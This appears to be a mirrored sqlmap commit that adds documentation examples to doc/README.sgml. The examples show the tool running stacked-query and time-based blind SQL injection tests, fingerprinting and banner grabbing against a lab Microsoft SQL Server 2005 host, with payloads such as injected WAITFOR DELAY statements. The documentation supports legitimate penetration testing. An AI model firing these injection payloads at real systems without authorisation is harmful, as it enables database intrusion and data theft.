PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-09 06:01:29 +00:00
Code Issues Projects Releases Wiki Activity

Updated documentation

Browse Source
This commit is contained in:
Bernardo Damele
2008-12-17 20:17:34 +00:00
parent dda62ba463
commit 94c79e3209
4 changed files with 211 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

100
doc/README.sgml
View File

@@ -1791,6 +1791,21 @@ back-end DBMS: PostgreSQL
stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
--stacked-test -v 1
[...]
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
</verb></tscreen>
<sect2>Test for Time based blind SQL injection
@@ -1839,6 +1854,23 @@ with stacked query syntax
time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
--time-test -v 1
[...]
back-end DBMS: Microsoft SQL Server 2005
[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
[15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
[15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
</verb></tscreen>
<sect2>Test for UNION query SQL injection
@@ -2221,6 +2253,27 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
html error message fingerprint: Microsoft SQL Server
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
[...]
[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
[hh:mm:51] [INFO] testing Microsoft SQL Server
[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
[hh:mm:51] [INFO] retrieved: 1
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
[hh:mm:51] [INFO] retrieved: 5
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
web server operating system: Windows 2003 or 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
html error message fingerprint: Microsoft SQL Server
</verb></tscreen>
<p>
If you want an even more accurate result, based also on banner parsing,
you can also provide the <tt>-b</tt> or <tt>--banner</tt> option.
@@ -2302,6 +2355,38 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
[...]
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
[...]
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
[hh:mm:03] [INFO] testing Microsoft SQL Server
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
[hh:mm:03] [INFO] retrieved: 1
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
[hh:mm:03] [INFO] retrieved: 5
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
[hh:mm:03] [INFO] query: @@VERSION
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
web server operating system: Windows 2003 or 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS operating system: Windows 2003 Service Pack 1
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0
version 9.00.1399
html error message fingerprint: Microsoft SQL Server
[...]
</verb></tscreen>
<p>
As you can see, from the Microsoft SQL Server banner, sqlmap was able to
correctly identify the database management system patch level.
@@ -2369,6 +2454,21 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
---
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
---
</verb></tscreen>
<sect2>Current user